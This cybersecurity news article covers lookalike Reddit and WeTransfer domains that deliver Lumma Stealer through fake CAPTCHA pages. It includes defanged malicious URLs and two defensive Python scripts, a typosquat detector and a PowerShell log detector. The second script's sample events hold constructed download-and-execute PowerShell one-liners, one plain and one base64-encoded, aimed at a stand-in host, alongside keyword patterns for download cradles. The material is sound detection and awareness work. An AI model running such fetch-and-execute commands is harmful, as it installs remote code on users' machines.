Cyber Security News

1,000+ Malicious Domains Mimic Reddit & WeTransfer To Deliver Malware

Over 1,000 malicious domains impersonating popular platforms such as Reddit and WeTransfer have been identified distributing malware, primarily the Lumma Stealer information stealer.

The campaign is a further example of attackers borrowing the trust users place in well-known brands so that victims download and run the malicious software themselves.

The Lumma Stealer malware, which has gained traction since its emergence in 2022, is a potent information-stealing tool designed to harvest sensitive data from infected systems.

It targets a wide array of information, including passwords, cryptocurrency wallet details, and browser data.

crep1x, a security analyst at Sekoia, noted that the malware operates on a Malware-as-a-Service (MaaS) model, which makes it available to a broad range of cybercriminals who can rent it and deploy it against unsuspecting victims without writing their own stealer.


Attack Analysis

The malicious domains closely mimic legitimate URLs. In both of the (defanged) examples below the brand name sits in a subdomain, while the registered domain (gmvr.org, tynd.org) has nothing to do with the brand; note also the doubled letter in "wettransfer":

  • hxxps://reddit-15.gmvr.org/topic/inxcuh?engine=opentext+encase+forensic
  • hxxps://wettransfer80.tynd.org/file/abbstd
Fake webpages (Source – X)

These domains are crafted to look authentic and are served with valid TLS certificates, so the browser shows the familiar padlock. The padlock only means the connection to the domain in the address bar is encrypted; any domain owner can obtain such a certificate for free, so it says nothing about whether that domain is the real Reddit or WeTransfer.

This tactic exploits the habit of equating the padlock with legitimacy. Cybersecurity experts warn that it significantly increases the likelihood of users falling victim to these phishing pages.
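The check that actually matters is therefore the registered domain, not the brand name somewhere in the hostname or the padlock. As an added example (not code from the article or from Sekoia), the following Python script applies that check to the two defanged indicators above plus constructed legitimate and unrelated URLs: it refangs the URL, picks out brand-like tokens in the hostname with a fuzzy match so that "wettransfer" still matches, and then compares the registered domain against an allow-list of the brand's real domains. The LEGIT_DOMAINS table and the two-label registrable-domain rule are simplifying assumptions for the example.

```python
import difflib
import re
from urllib.parse import urlsplit

# Assumed allow-list: brand name -> registrable domains that really belong to it.
LEGIT_DOMAINS = {
    "reddit": {"reddit.com", "redd.it"},
    "wetransfer": {"wetransfer.com", "we.tl"},
}

# Constructed sample: the two defanged indicators from the article plus
# legitimate and unrelated URLs as controls.
SAMPLE_URLS = [
    "hxxps://reddit-15.gmvr.org/topic/inxcuh?engine=opentext+encase+forensic",
    "hxxps://wettransfer80.tynd.org/file/abbstd",
    "https://www.reddit.com/r/netsec/",
    "https://wetransfer.com/downloads/abc",
    "https://cdn.example.net/assets/app.js",
]


def refang(url):
    """Undo the usual defanging (hxxp, [.]) so the URL can be parsed."""
    return url.replace("hxxp", "http").replace("[.]", ".")


def registrable_domain(host):
    """Last two labels of the hostname. Good enough for .org/.com; a real
    deployment should use the Public Suffix List so co.uk-style suffixes work."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def impersonated_brand(host, threshold=0.8):
    """Return the brand a hostname label resembles, or None.

    Labels are split on dots, hyphens and digits, so 'reddit-15' yields the
    token 'reddit'; the similarity ratio lets typosquats with a doubled or
    dropped letter ('wettransfer') still match.
    """
    for token in re.split(r"[-.\d]+", host.lower()):
        if not token:
            continue
        for brand in LEGIT_DOMAINS:
            if difflib.SequenceMatcher(None, token, brand).ratio() >= threshold:
                return brand
    return None


def classify_url(url):
    """'lookalike:<brand>' if a brand token appears on a domain the brand
    does not own, 'legitimate' if it is one of the brand's own domains,
    'no-brand' otherwise."""
    host = urlsplit(refang(url)).hostname or ""
    brand = impersonated_brand(host)
    if brand is None:
        return "no-brand"
    if registrable_domain(host) in LEGIT_DOMAINS[brand]:
        return "legitimate"
    return f"lookalike:{brand}"


def scan(urls):
    """Map every URL to its verdict."""
    return {url: classify_url(url) for url in urls}


if __name__ == "__main__":
    for url, verdict in scan(SAMPLE_URLS).items():
        print(f"{verdict:22} {url}")
```

The fuzzy match is deliberately loose (a single doubled or dropped letter still scores above 0.8) because typosquats are cheap to generate; false positives are limited by the allow-list, which turns a brand hit on the brand's own domain into "legitimate".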

Lumma Stealer is delivered through several lures. One common method is a fake CAPTCHA page hosted on the phishing site: under the guise of a "verification" step, the page gets the user to run a PowerShell command that downloads and executes the malware.

No browser exploit is involved; the victim's own action launches the payload, which is why the resulting PowerShell process is the most reliable place to detect the infection. Once installed, Lumma Stealer communicates with its Command and Control (C2) servers via HTTP POST requests to exfiltrate stolen data.

The malware is capable of scanning for specific files containing sensitive information, such as those related to cryptocurrency wallets and passwords.
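Because the infection starts with a PowerShell command the victim runs, a process-creation log is the natural place to catch it. The following Python example is added here and is not part of the article: it runs over constructed Sysmon-style events (the field names ParentImage, Image and CommandLine are assumptions for the example) and flags PowerShell launches whose command line, or whose decoded -EncodedCommand payload, contains a download cradle or a combination of evasion switches. The sample command lines are constructed for illustration and use the reserved .invalid TLD.

```python
import base64
import re

# Indicator patterns, matched case-insensitively against the raw command line
# and against the decoded text of any -EncodedCommand payload.
INDICATORS = {
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
        r"invoke-restmethod|\birm\b|net\.webclient|start-bitstransfer", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "hidden_window": re.compile(r"-w[a-z]*\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "policy_bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass|-nop\b|-noprofile", re.I),
}
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
POWERSHELL_RE = re.compile(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?$", re.I)


def decode_encoded_command(cmdline):
    """-EncodedCommand takes base64 of UTF-16LE text; return that text or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Return the set of indicator names that fire for one process event."""
    if not POWERSHELL_RE.search(event.get("Image", "")):
        return set()
    text = event.get("CommandLine", "")
    decoded = decode_encoded_command(text)
    if decoded:
        text = text + "\n" + decoded
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def is_suspicious(indicators):
    """A download cradle alone is enough to alert. The other switches show up
    in legitimate automation one at a time, so require two of them together."""
    return "download_cradle" in indicators or len(indicators) >= 2


def detect(events):
    """Return [(event index, sorted indicator names)] for suspicious events."""
    hits = []
    for i, ev in enumerate(events):
        ind = analyze_event(ev)
        if is_suspicious(ind):
            hits.append((i, sorted(ind)))
    return hits


def _b64_utf16(script):
    """Encode a script the way powershell -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events in a Sysmon-like shape (field names are an
# assumption for this example). Hosts use the reserved .invalid TLD.
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {   # the kind of one-liner a fake-CAPTCHA lure asks the victim to run
        "ParentImage": r"C:\Windows\explorer.exe", "Image": PS_EXE,
        "CommandLine": "powershell -w hidden -c \"iex (New-Object Net.WebClient)"
                       ".DownloadString('https://example.invalid/verify')\"",
    },
    {   # same idea hidden behind -EncodedCommand
        "ParentImage": r"C:\Windows\explorer.exe", "Image": PS_EXE,
        "CommandLine": "powershell -nop -e "
                       + _b64_utf16("iex (iwr 'https://example.invalid/p').Content"),
    },
    {   # benign scheduled admin script: one lesser indicator, no alert
        "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS_EXE,
        "CommandLine": r"powershell -NoProfile -File C:\Scripts\rotate-logs.ps1",
    },
    {   # not PowerShell at all
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
        "CommandLine": r'"C:\Program Files\Mozilla Firefox\firefox.exe" https://reddit.com',
    },
]

if __name__ == "__main__":
    for index, indicators in detect(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(indicators)}")
```

Decoding the -EncodedCommand payload before matching is the important step: a rule that only inspects the raw command line sees nothing but base64. In a real deployment the parent process (explorer.exe for a command pasted by the user, a browser for a downloaded script) is worth a second rule of its own.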

The rise in these malicious domains is indicative of a broader trend where attackers exploit established platforms’ reputations.

For instance, phishing campaigns pair these sites with social engineering: emails or notifications that look like a genuine Reddit or WeTransfer message carry links that lead to the fraudulent domains instead.

Moreover, hosting the phishing pages behind CDNs helps the attackers evade traditional controls. The traffic originates from reputable shared infrastructure that cannot simply be blocked by IP address, so reputation-based filtering is less effective and the sites stay up longer.

To combat this growing threat, cybersecurity professionals recommend several strategies:

  • Verify URLs: Check the registered domain (the part immediately before .com, .org and so on), not just whether the brand name appears somewhere in the address; a padlock or valid certificate is no guarantee of legitimacy.
  • Enable Two-Factor Authentication: This limits the value of stolen passwords. It does not protect against a stealer that exfiltrates browser session cookies, so revoke active sessions as well as changing passwords after an infection.
  • Educate Users: Awareness campaigns about phishing tactics help users recognize these lures; in particular, no legitimate CAPTCHA or "verification" step ever asks the user to run a command on their own machine.


Tushar Subhra Dutta

Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.
